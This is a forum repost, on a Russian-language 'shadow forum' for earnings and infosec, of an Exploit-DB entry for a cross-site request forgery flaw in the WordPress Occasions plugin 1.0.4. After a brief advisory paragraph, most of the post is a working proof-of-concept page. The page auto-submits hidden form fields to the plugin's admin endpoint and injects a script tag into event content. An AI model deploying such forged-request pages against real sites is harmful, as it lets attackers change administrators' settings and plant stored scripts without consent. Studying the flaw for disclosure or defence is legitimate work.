WordPress Plugin Occasions - Cross-Site Request Forgery | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 38393

Проверка EDB

Пройдено

Автор: M3TAMANTRA

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: N/A

Дата публикации: 2013-03-19

WordPress Plugin Occasions - Cross-Site Request Forgery

HTML:

source: https://www.securityfocus.com/bid/58599/info

The Occasions plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

Occasions 1.0.4 is vulnerable; other versions may also be affected. 

<html> <head><title>CSRF Occasions</title></head> <body> <!-- www.example.com:9001/wordpress --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST"> <input type="hidden" name="action" value="saveoccasions" /> <input type="hidden" name="nodes[]" value="1" /> <input type="hidden" name="occ_title1" value="CSRF Vulnerability" /> <input type="hidden" name="occ_startdate1" value="18.03." /> <input type="hidden" name="occ_enddate1" value="28.03." /> <input type="hidden" name="occ_type1" value="1" /> <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" /> <script>document.forms[0].submit();</script> </form> </body> </html>

Источник: www.exploit-db.com

Поиск

Exploit WordPress Plugin Occasions - Cross-Site Request Forgery

Exploiter

Похожие темы